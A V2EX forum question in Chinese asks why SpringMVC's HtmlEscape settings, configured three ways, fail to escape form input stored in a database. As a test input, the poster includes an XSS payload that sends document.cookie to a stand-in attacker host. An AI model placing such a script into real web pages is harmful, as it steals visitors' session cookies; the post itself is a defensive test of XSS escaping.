SpringMVC: HtmlEscape 设置没起作用怎么回事?

2017-11-28 21:25:52 +08:00
 kenduffy

项目用的是 SpringMVC+jsp

想要对提交表格的内容进行字符转义防止 XSS 攻击

根据 http://www.codeweblog.com/spring-mvc-%E5%AE%89%E5%85%A8/

做处理,下面三条都做了

1)web.xml 中添加

     <context-param>     <param-name>defaultHtmlEscape</param-name>      <param-value>true</param-value> </context-param>

2)在包含 form 的 jsp 页面中添加

<spring:htmlEscape defaultHtmlEscape="true" />

3 )直接在 form 中的元素中添加

<form:input path="someFormField" htmlEscape="true" />或<form:form htmlEscape="true">

然后在表格上添加

点击就送百元现金

<script>document.getElementById('attacker').href='http://www.attacker_741.com/receiveCookies.html?'+document.cookie;</script>

发现存进数据库的没有转移,依然是原文

怎么回事啊?

2671 次点击
所在节点    问与答
1 条回复
kenduffy
2017-11-28 21:51:45 +08:00
顶顶顶

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/410308

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX